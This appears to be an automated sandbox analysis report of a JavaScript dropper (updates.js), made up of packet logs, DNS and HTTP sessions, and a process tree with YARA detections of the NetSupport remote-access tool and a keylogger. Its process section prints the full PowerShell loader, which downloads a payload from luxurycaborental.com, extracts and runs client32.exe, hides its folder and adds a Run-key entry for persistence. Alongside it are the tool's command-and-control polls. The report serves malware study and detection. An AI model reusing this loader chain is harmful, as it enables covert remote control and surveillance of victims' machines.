                                                                            Jul 17, 2024 15:20:00.169894934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169909954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169945002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.169984102 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170159101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170175076 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170191050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170206070 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170222044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170227051 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170237064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170253992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170259953 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170272112 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170289040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170300961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170305967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170330048 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170367956 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170495987 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170511961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170530081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170545101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170562029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170578957 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170583963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170600891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170615911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170619011 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170633078 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170650005 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170656919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170672894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170681000 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170686960 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170710087 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170727968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170744896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170751095 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170792103 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.170883894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170964956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.170981884 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.171000957 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.171017885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.171020031 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.171036005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.171046019 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.171052933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.171087980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179337025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179392099 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179408073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179420948 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179455042 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179486990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179502964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179517984 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179544926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179550886 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179562092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179579020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179591894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179595947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179627895 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179709911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179725885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179740906 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179757118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179759979 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179771900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179788113 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179802895 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179804087 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179821014 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179826975 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179838896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179862976 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179893970 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.179927111 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179943085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.179959059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180001020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180003881 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.180016041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180043936 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.180078030 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180094004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180109024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180124998 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180135012 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.180140972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180156946 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180160999 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.180185080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180200100 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.180202007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180217028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180232048 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.180233002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.180270910 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.227027893 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.261368036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261399031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261413097 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261526108 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261528969 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.261540890 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261555910 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261570930 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.261595964 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.261625051 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.264280081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264295101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264311075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264347076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.264379025 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.264446020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264461040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264476061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264498949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.264528036 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.264573097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266038895 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266091108 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266104937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266120911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266139984 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266170025 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266179085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266283035 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266297102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266311884 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266328096 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266330957 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266344070 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266366005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266366005 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266380072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266395092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266408920 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266412973 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266441107 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266473055 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266520023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266535044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266550064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266566038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266581059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266583920 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266597033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266611099 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266613007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266628027 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266644001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266649961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266675949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266829967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266844034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266858101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266872883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266881943 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266889095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266905069 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266906977 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266921043 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266936064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266947031 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266949892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266963959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266974926 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266979933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267019033 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267062902 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267163038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267177105 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267190933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267205954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267220974 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267230988 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267236948 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267255068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267268896 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267270088 CEST804970438.180.60.246192.168.2.5
                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Jul 17, 2024 15:19:55.846592903 CEST | 62382 | 53 | 192.168.2.5 | 1.1.1.1
                                                                            Jul 17, 2024 15:19:56.015548944 CEST | 53 | 62382 | 1.1.1.1 | 192.168.2.5
                                                                            Jul 17, 2024 15:20:01.710469007 CEST | 62630 | 53 | 192.168.2.5 | 1.1.1.1
                                                                            Jul 17, 2024 15:20:01.726466894 CEST | 53 | 62630 | 1.1.1.1 | 192.168.2.5
                                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                            Jul 17, 2024 15:19:55.846592903 CEST | 192.168.2.5 | 1.1.1.1 | 0xf40d | Standard query (0) | luxurycaborental.com | A (IP address) | IN (0x0001) | false
                                                                            Jul 17, 2024 15:20:01.710469007 CEST | 192.168.2.5 | 1.1.1.1 | 0x9f07 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
                                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                            Jul 17, 2024 15:19:56.015548944 CEST | 1.1.1.1 | 192.168.2.5 | 0xf40d | No error (0) | luxurycaborental.com |  | 38.180.60.246 | A (IP address) | IN (0x0001) | false
                                                                            Jul 17, 2024 15:20:01.726466894 CEST | 1.1.1.1 | 192.168.2.5 | 0x9f07 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
                                                                            Jul 17, 2024 15:20:01.726466894 CEST | 1.1.1.1 | 192.168.2.5 | 0x9f07 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
                                                                            Jul 17, 2024 15:20:01.726466894 CEST | 1.1.1.1 | 192.168.2.5 | 0x9f07 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
                                                                            • luxurycaborental.com
                                                                            • 194.180.191.69 (connection: keep-alive, cmd=poll, info=1, ack=1)
                                                                            • geo.netsupportsoftware.com
                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            0 | 192.168.2.5 | 49704 | 38.180.60.246 | 80 | 612 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jul 17, 2024 15:19:56.028702021 CEST | 91 | OUT | GET /cdn-vs/data.php?12105 HTTP/1.1
                                                                            Host: luxurycaborental.com
                                                                            Connection: Keep-Alive
                                                                            Jul 17, 2024 15:19:56.526896000 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Wed, 17 Jul 2024 13:19:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            Vary: Accept-Encoding


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            1 | 192.168.2.5 | 49705 | 194.180.191.69 | 443 | 892 | C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jul 17, 2024 15:20:01.691487074 CEST | 220 | OUT | POST http://194.180.191.69/fakeurl.htm HTTP/1.1
                                                                            User-Agent: NetSupport Manager/1.3
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 22
                                                                            Host: 194.180.191.69
                                                                            Connection: Keep-Alive
                                                                            CMD=POLL
                                                                            INFO=1
                                                                            ACK=1
                                                                            Data Raw:
                                                                            Data Ascii:


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            2 | 192.168.2.5 | 49706 | 104.26.0.231 | 80 | 892 | C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jul 17, 2024 15:20:01.769767046 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                            Host: geo.netsupportsoftware.com
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Jul 17, 2024 15:20:02.456142902 CEST | 935 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 17 Jul 2024 13:20:02 GMT
                                                                            Content-Type: text/html; Charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            CF-Ray: 8a4a86ed8d130ca8-EWR
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: private
                                                                            Set-Cookie: ASPSESSIONIDSQQQBSDC=HMMBFAEDNCIHLGLIPPLELIOC; path=/
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                            Vary: Accept-Encoding
                                                                            cf-apo-via: origin,host
                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U5UH%2B9riilQ0HtpdtlKBK9SwyvkWVx8KTlnvSRFZkNuawlfqA9IVKx0w9IcxW%2FB4cB9dz9i5D6HRjDPa%2Bxl0Vzhk5ZY0gj7hVweFUXYI4H1Vb59OHhY7NPsq5mqnppDVIWI7wv5ptnerSQ%2F3"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10\r\n40.7357,-74.1724\r\n0\r\n\r\n


                                                                            Target ID:0
                                                                            Start time:09:19:48
                                                                            Start date:17/07/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
                                                                            Imagebase:0x7ff687db0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:09:19:53
                                                                            Start date:17/07/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C67C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C686000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C37F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C7AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C65D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:09:19:53
                                                                            Start date:17/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:09:20:00
                                                                            Start date:17/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3402960435.0000000003482000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.2231581976.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 26%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:09:20:10
                                                                            Start date:17/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2327778463.0000000001168000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2324165734.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2328346268.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
